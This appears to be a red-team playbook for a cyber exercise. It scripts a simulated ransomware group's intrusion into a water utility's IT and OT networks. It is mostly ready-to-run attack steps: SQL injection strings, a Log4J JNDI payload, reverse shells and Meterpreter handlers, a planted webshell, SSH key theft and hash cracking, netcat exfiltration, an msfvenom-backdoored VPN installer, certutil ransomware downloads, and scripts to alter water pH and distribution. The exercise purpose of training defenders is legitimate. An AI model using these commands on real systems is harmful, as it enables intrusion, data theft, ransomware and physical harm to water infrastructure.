# CIDeX 22 MESL * TTP Google Excel Link https://docs.google.com/spreadsheets/d/199mK8J7aUwSANgao2tDoB4UAN9exMi1or9_toE1LREA/edit#gid=523738876 # Day 0 - FIREANT gaining C2 on CW from IT to OT In this phase, the FIREANT ransomware group conducts reconnaissance on CW, and launch Log4J network into the depth of CW. ### Reconnaissance ### <mark style="background-color: lightblue">Conducting Reconnaissance against Web Server <font size="1">(http://01.clearwater.com 100.100.1.12)</font></mark> #### **1. Surf the following sub-pages on the CW web page** ``` http://01.clearwater.com/ http://01.clearwater.com/function.php [Tabs on the main page] http://01.clearwater.com/filter.php [Tabs on the main page] http://01.clearwater.com/login.php [Tabs on the main page] ``` #### **2. Run various enumeration tool against the CW web page** * Nikto (Scan for vulnerabilities) ```nikto -h http://01.clearwater.com``` * Nmap (Scan for other open ports) ```nmap -sC -sV 01.clearwater.com``` * SQLi attempt on /login.php (username | password)* * Failed attempt (to generate logs) ```admin | admin ``` ```OR 1 = 1 | OR 1 = 1``` ```OR = 1 -- | OR = 1 --``` ```OR '1' = '1' | OR '1' = '1' ``` * Successful attempt ```' OR 1=1 -- | ' OR 1=1 -- ``` * Wfuzz (Web content scanner) ```wfuzz --hc 404 -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 01.clearwater.com/FUZZ``` ```wfuzz --hc 404 -c -w wordlist_url.txt FUZZ01.clearwater.com``` ### <mark style="background-color: lightblue">Conducting Reconnaissance against Staff Portal <font size =1>(http://staff.01.clearwater.com 100.100.1.21)</font></mark> #### **1. Run various enumeration tool against Staff Portal** * Nmap scan revealed that the Staff Portal is hosted on port 8080 (Apache Tomcat/Coyote JSP engine 1.1) ```nmap -sC -sV staff.01.clearwater.com``` * Nikto (Scan for vulnerabilities) ```nikto -h staff.01.clearwater.com -port 8080 ``` * Wfuzz (Web content scanner) ```wfuzz --hc 404 -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt staff.01.clearwater.com:8080/FUZZ``` #### 2. Surf the following sub-pages on the Staff Portal ``` http://staff.01.clearwater.com:8080/ http://staff.01.clearwater.com:8080/business [Tabs on the main page] http://staff.01.clearwater.com:8080/login [Tabs on the main page] ``` #### **3. SQLi attempt (username | password)** * Failed attempt ```' OR 1=1 -- | ' OR 1=1 -- ``` ## Initial Access In this phase, the attacker gains initial access into the CW network through exploiting the Log4J vulnerability on the Staff Portal. ### <mark style="background-color:lightblue">Initial Access to Staff Portal <font size = 1>(http://staff.01.clearwater.com:8080 100.100.1.21:8080)</font></mark> #### **1. Running Log4J attack against both Web and Staff Portal** * Launching Log4J python script and setting up listener on Kali VM - Terminal 1: ```sudo su``` ```cd /home/kali/kayler``` ```python3 log4j-shell-poc-main/poc.py --userip www.tnaerif123.com --webport 8080 --lport 8082``` ```sudo msfconsole``` - Terminal 2: ```use exploit/multi/handler``` ```set payload generic/shell_reverse_tcp``` ```set lhost <<KALI IP>>``` ```set lport <port>``` ```run``` * Entering ldap commands into the staff login page - Head over to both of the login page ```http://01.clearwater.com/login.php``` ```http://staff.01.clearwater.com:8080/login``` - Paste the generated payload into the 'Username' field and click 'Submit' ```${jndi:ldap://www.tnaerif123.com:1389/a}``` *#The attack didn't work at Web Server* *#A basic shell will be spawned at Staff Portal* ## Enumeration ### <mark style="background-color: lightblue">Enumerating Staff Server <font size=1>(http://staff.01.clearwater.com:8080)</font></mark> #### **1. Host Enumeration** * Enumerating host and found docker0 network interface ```ip add``` ```ls -la /``` * List all folders in the current directory ```ls -la``` * Finding tomcat folder that host files ``` ls cd webapps ls cd ROOT ls cd WEB-INF ls cd views ls cat BusinessView.jsp ``` #### **2. Data Exfiltrating using tomcat** - Download jsp webshell <font size="1">https://github.com/tutorial0/WebShell/blob/master/Jsp/Jspspy%20web~shell%20V1.0%20%E2%80%BBMADE%20by%20%E5%AD%A4%E6%B0%B4%E7%BB%95%E5%9F%8E%20QQ540410588.jsp</font> and set up Kali webserver with malicious webshell ``` python3 -m http.server 8000 ``` - Replacing http://staff.01.clearwater.com:8080/business with malicious webshell using the C2 shell from Log4J ``` cd /usr/local/tomcat/webapps/ROOT/WEB-INF/views wget www.tnaerif123.com:8000/webshell.jsp -O BusinessView.jsp ``` - Serving the uploaded webshell ```Web server staff.01.clearwater.com/business``` ```log in as "admin"``` (head back to 100.100.1.21:8080/business if faced with any issuse) ```search for "/"``` (root directory) ```download (下载) the following files from .ssh folder``` ``` - id_rsa - id_rsa.pub - known_hosts ``` #### **3. Cracking Credential Offline on Kali VM** - Extracting creds *#Identifying Username "user@ubuntu"* ```cat id_rsa.pub``` *#Changing permission of private key* ```chmod 600 id_rsa``` *#Cracking the hash to find out the IP of Remote Machine* * Convert the known_hash into a format that hashcat can use and crack it <font size="1">https://github.com/chris408/known_hosts-hashcat.git</font>* ```python3 kh-converter.py known_hosts > converted_known_hosts``` ```hashcat -m 160 --quiet --hex-salt converted_known_hosts -a 3 ipv4_hcmask.txt``` // The cracked hash return '10.1.12.13' ```#Remember to clear potfile (~/.local/share/hashcat/hashcat.potfile)``` * Based on the `ip a` from Staff Portal, we see the public IP of Staff portal being mapped to it's private IP (100.100.1.21 => 10.1.12.21). Therefore, the attack tries to map 10.1.12.13 to 100.100.1.13. This allowed the attacker to enter App Server via SSH. * #Ping the IP above to dertermine if the IP was accessible* ```ping -c 3 100.100.1.13``` #### 4. Establishing connection to the App Server via stolen id_rsa key (100.100.1.13) - SSH into the App Server using ida_rsa from the Kali VM ```ssh user@100.100.1.13 -i id_rsa``` - Further enumerating the App Server ```ip add``` ```pwd``` ```ls -la``` ```cd /``` *#cd to root directory* ```find . | grep "pass"``` ```find . | grep "user"``` ```find . | grep "creds"``` ```ls -la /home/user/Desktop``` ```cd ~/Desktop``` ```zip archive test.doc doge.xls``` - revealed bookmarks in .mozilla folder *#Navigate to bookmark folder to exfiltrate bookmarks* ```ls /home/user/.mozilla``` ```cd /home/user/.mozilla/firefox/``` ```ls``` ```cd e8tkjus5.default-release/bookmarkbackups``` ```ls``` ```zip archive2 bookmarks-*``` - Use netcat to exfilitrate the zip files *#Kali* ```nc -nvlp 8083 > archive2.zip ``` *#App Server* ```nc 100.101.1.16X 8083 < archive2.zip``` *#Kali* ```nc -nvlp 8083 > archive.zip ``` *#App Server* ```cd ~/Desktop``` ```nc 100.101.1.16X 8083 < archive.zip``` - Simulate finding of data inside the zipped files and wait for 5~10 minutes - *#Attempt to ping url* <font style=color:red>need to see if it is domain name or still IP</font> ```ping -c 3 10.1.10.4``` ```uname -a``` *#Ping was successful, machine has access to 10.1.10.x subnet.* - Establish a Meterpreter session to staff main machine <font style=color:red>For routing purposes, will change if there's alternative</font> *#Background (ctrl-z) all session and create a listener* ```background``` ```use multi/handler``` ```set payload linux/x64/meterpreter/reverse_tcp``` ```set lhost <KALI IP>``` ```set lport 7171``` ```exploit``` *#Generate a meterpreter reverse shell* ```msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<KALI IP / DOMAIN> LPORT=8083 -f elf -o reverse.elf``` ```python3 -m http.server 8000``` *#Run the following in the victim's SSH instance* ```wget <KALI IP / DOMAIN>:8000/reverse.elf``` ```chmod 777 rev2.elf``` ```./rev2.elf``` ## Lateral Movement ### <mark style="background-color :lightblue">Lateral Movement from Apps Server to File Server</mark> - NMap File server *#Adding route to 10.1.10.0 subnet* ```bg``` ```use autoroute``` ```use 0``` ```set cmd add``` ```set subnet 10.1.10.0``` ```set netmask 255.255.255.0``` ```set session <App Server shell session> ``` ```run``` - Use portscan(nmap) to scan File Server for open port ```use auxiliary/scanner/portscan/tcp``` ```set rhosts 10.1.10.4``` ```run``` *#Port 80 is opened* - Accessing web portal of File Server *#Portforward local port 80 to File Server port 80 using App Server as the port forwarder to view the file server portal* ```sessions -i X (App Server's session)``` ```portfwd add -l 80 -p 80 -r 10.1.10.4``` *#Visit the File Server web portal* ```http://127.0.0.1/ (using firefox)``` *#Found file server to be running Gitlab 13.9.0* - Identifying the vulnerabilities *#After registering an account, visit the help page to identify the version of Gitlab it is running* <font size="1">(https://vulners.com/zdt/1337DAY-ID-36997)</font> ```GitLab Community Edition 13.9.0, which is vulnerable to Remote ExifTool Command Injection``` *#Executing the exploit* ```bg``` ```use exploit/multi/http/gitlab_exif_rce``` ```set payload linux/x64/meterpreter/reverse_tcp``` ```set rhosts 10.1.10.4``` ```set srvport 8081``` ```set lhost <KALI IP>``` ```set lport 8084``` ```run``` <font style=color:red>^^ from blue POV, should see file server making a web request (using wget) to attacker random name file</font> ### <mark style="background-color: lightblue">Enumerating the Gitlab</mark> - Use the newly created account above to look through the projects within the gitlab under the "Explore Project" tabs - Created new gitlab user named "Evelyn Frank10" to spoof as one of the the employee - Create new Project using "Evelyn Frank10" ### <mark style="background-color: lightblue">Malicious project on Gitlab</mark> - Create a new project named "VPN Testing2" as user "Evelyn Frank10", and backdoor a FortiClient VPN installer for user to download. *# Download https://links.fortinet.com/forticlient/win/fabricagent* *#Generate Windows payload* ```msfvenom -a x86 --platform windows -x FortiClientOnlineInstaller.exe -k -p windows/meterpreter/reverse_tcp LHOST=10.1.10.4 LPORT=9005 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o FortiClientVPNInstaller.exe``` *#Head over to the newly created project and upload the file* ## Lateral Movement to Other Machines - Set up listener on fileserver *Currently, the route to 10.1.10.X (File Server subnet) is routed through App Server shell session. To set up listener on File Server itself, we would need to kill the exsisting route pointing to App server and create another route on File Server 10.1.10.X subnet using gitlab shell session* *#Kill the existing route* ```bg``` ```route del 10.1.10.0/24 <App Server Shell Session ID>``` *#Add new route* ```use autoroute``` ```use 0``` ```set session <gitlab shell session ID>``` ```run``` ```route``` *#Ensure that 10.1.10.4 points to gitlab shell session ID* - Set up a listener on File Server ```use multi/handler``` ```set payload windows/meterpreter/reverse_tcp``` ```set lhost 10.1.10.4``` ```set ExitOnSession false``` ```set lport 9005``` ```run -j``` *#Ensure that the listener is running on 10.1.10.4* <font style=color:red>IF CANT GET CONNECTION BACK, NEED TO REATTACH NETWORK INTERFACE</font> - Wait for Maintenance System admin and Domain user to download and run the payload *#Maintenance Access* ```log into the maintenance machine``` ```access to the gitlab project``` ```download and run``` *#Domain user Access* ```log into any domain user``` ```access to the gitlab project``` ```download and run``` # Day 0 & Day 1 1000H - MANTIS Reconnaissance against GPGP * CY add some recon stuff here # Day 1 1000H - FIREANT Ransomware Attacks ### Ransomware Attack - PSExec into the following terminals and repeat the commands: ``` ## IT and OT Impact Prep - Ransomware - Host the files using Kali ```cd WinUpdate``` ```python3 -m http.server 9009``` - Download to Domain user and Maintenance ```cd %temp%``` ```certutil -urlcache -f http://100.101.1.16X:9009/update.jpg %cd%\update.jpg``` ```certutil -urlcache -f http://100.101.1.16X:9009/update.bat %cd%\update.bat``` ```certutil -urlcache -f http://100.101.1.16X:9009/LB3.exe %cd%\LB3.exe``` *#Spread the files using PsExec* ``` OR - Drop the ransomware.ps1 in /kayler - Open the session connecting to the victim and launch the ps1 script - reboot afterwards ``` cd /home/kali/kayler python3 -m http.server 9009 certutil -urlcache -f http://100.101.1.16X:9009/ransomware.ps1 %cd%\ransomware.ps1` powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file ransomware.ps1 ``` - Prompt White Cell to showcase the Screenshot from Ransomware attack # Day 1 1300H - MANTIS launching CW OT Attack ### Re-enter network using Backdoor of FIREANT * WIP, either ssh or enter using sqli from web server ### OT Impact Prep - Water distribution * Access to OT using Maintenance *#find the session to Maintenance machine* ```session``` ```session -i <ID of Maintenance machine>``` *#Enumeration revealed access to OT* ```dir``` ```whoami``` ```cd``` *#Found OT related document on the Desktop* ```cd Desktop``` ```dir``` ```cat start_history_extract.bat - Shortcut.lnk``` ```cd Hist-Extract old``` *#Found credential in one of the file* ```cat troubleshoot.txt``` (access to mavis:P@ssw0rd at 192.168.1.248) *#Download the content using Meterpreter* * Testing and adding route to Engineering Workstation ```ping -c 192.168.1.248``` *#Add a route to 192.168.1.X subnet* ```bg``` ```run autoroute``` ```set subnet 192.168.1.0``` ```set netmask 255.255.255.0``` ```set session <Maintenance shell session ID>``` ```set cmd add``` ```run``` *#Using Socks proxy to ssh to Mavis* ```use socks_proxy``` ```use 0``` ```set SRVPORT 9050``` ```set VERSION 4a``` ```run``` *#ssh to Mavis* ```Proxychains ssh mavis@192.168.1.248``` ```P@ssw0rd``` ### OT Discovery and Pivoting * Retrieve tag for Water Distribution ```proxychains python3 gettag.py``` (need test tmr) WADI - Launch port scanner to discover Modbus and ENIP ``` Set-ExecutionPolicy Bypass Import-Module .\port-scan-tcp.ps1 0..255 | foreach { port-scan-tcp 192.168.1.$_ 502, 44818 } ``` or ``` Portscan using meterpreter use portscan/tcp use 0 set port 502,44818 set rhost 192.168.1.0/24 run ``` - Launch PLC tags discovery ``` cd OT_Attacks proxychains python3 taglist_swat.py proxychains python3 taglist_wadi.py ``` or ``` proxychains scp taglist_swat.py mavis@192.168.1.248:C:/User/mavis/taglist_swat.py proxychains scp taglist_swat.py mavis@192.168.1.248:C:/User/mavis/taglist_wadi.py python3 taglist_swat.py python3 taglist_wadi.py ``` <font style=color:red>might need use scp to drop into mavis to run</font> ### OT Process Data exfilitration - Launch Historian dump - Drop tag extraction onto HMI ```proxychains scp user@100.101.1.140:C:/USERS/USER/Desktop/bup_script/dist/Client.exe``` ``` proxychains python extract_tags_main.py ``` <font style=color:red>might need use scp to drop into mavis to run</font> ### OT Attacks *#Create Distribute Water and UV Poison OT attack* ```Modify the script exfiltrated using Maintenance shell``` - Force WADi to continue distributing water ``` proxychains python3 Distribute water.py ``` - Tries to change SWaT's pH below 7 ``` proxychains python3 UV poison.py ``` OR - Force WADi to continue distributing water ``` - scp start_water.py mavis@192.168.1.248:C:/User/mavis/start_water.py - python3 start_water.py ``` - Tries to change SWaT's pH below 7 ``` - scp UV poison.py mavis@192.168.1.248:C:/User/mavis/UV poison.py - python3 UV poison.py ``` # Day 1 1500H - MANTIS launching GPGP OT Attack ## Initial Access & Execution - <span style="color:green"><GT Action></span> Administrator (10.1.20.51) executed malicious Grass Marlin - <span style="color:green"><GT Action></span> Connect USB onto the host, and extract GrassMarlin-Win-64. - <span style="color:green"><GT Action></span> Right click and launch as administrator - Malware injects the keylogger named "GrassMarlin.dll" into svchost.exe - <span style="color:green"><GT Action></span> Administrator send email to management and update the progress of the installation ## Collection & Lateral Movement - Collection - Key logger sniffs username through listening to input of the domain username concatenated with "01.gpgp.com" - Upon keying in <username>@01.gpgp.com, the injected malware start to record keystrokes until the user hits enter or more than 16 characters - The stored password is in `C:\Windows\Temp\marlin.config` - Lateral Movement to the DC - Malware use wmic to copy the stage 2 payload into pdc and run it - Stage 2 payload drops Stage 3 payload and disseminate it to the IT, Management and HR OU - Lateral Movement to the Billing Portal - SSH and inject a webshell into the first line of index.jsp ## C2 via HTTP using CADERA - Drop OT malware on Marvis and launch it # Day 2 0600H - Automated Wiper Malware Explode ### Exploding Wiper - Wiper Malware will be distributed to Accounting, Engineering and Management OU via DC using the update.ps1 running on DC - Affected host: - Agapios.Ling (10.1.20.21) - Akhila.Kaur (10.1.20.22) - Bethel.Hayden (10.1.20.27) - Chetan.Chaudhri (10.1.20.28) - Chun.Hu (10.1.20.29) - Connie.Peters (10.1.20.30) - Destiny.Lucas (10.1.20.31) - Elias.Nussbaum (10.1.20.32) - Eustachys.Den (10.1.20.33) ''' todo --staff-- update /etc/resolv.conf to point www.tnaerif123.com to kali clean up .21 add ssh and network resolv to docker -- sudo docker run -v /etc/server.xml:/usr/local/tomcat/conf/server.xml -v /tmp/log:/usr/local/tomcat/logs -v /home/user/.ssh:/.ssh --log-driver syslog --log-opt syslog-address=udp://10.1.13.3:5044 -d --network host greatpower --www dns-- update golden cuz hosts file updated --appsvr-- need to clean files update golden cuz resolv updated --gitlabsvr-- update golden cuz resolv updated msfvenom -a x86 --platform windows -x FortiClientOnlineInstaller.exe -k -p windows/meterpreter/reverse_tcp LHOST=10.1.10.4 LPORT=9005 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o FortiClientInstaller.exe '''